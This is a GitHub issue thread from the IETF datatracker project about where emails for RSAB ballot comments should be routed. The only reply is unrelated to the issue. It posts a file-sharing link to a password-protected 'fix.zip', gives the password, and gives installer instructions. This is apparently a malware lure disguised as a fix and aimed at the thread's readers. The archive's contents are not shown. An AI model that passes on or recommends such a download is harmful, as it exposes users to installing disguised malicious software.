### ISSUE TITLE
RSAB voting: email address

### ISSUE THREAD

**Issue by elear** [ietf-tools/datatracker#7861]
### Describe the issue

If someone ballots with a comment, the email should go to the RSAB and to the RSWG.  Currently it seems to be set up to go to the IESG and a host of other optional locations.

### Code of Conduct

- [X] I agree to follow the [IETF's Code of Conduct](https://github.com/ietf-tools/.github/blob/main/CODE_OF_CONDUCT.md)

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
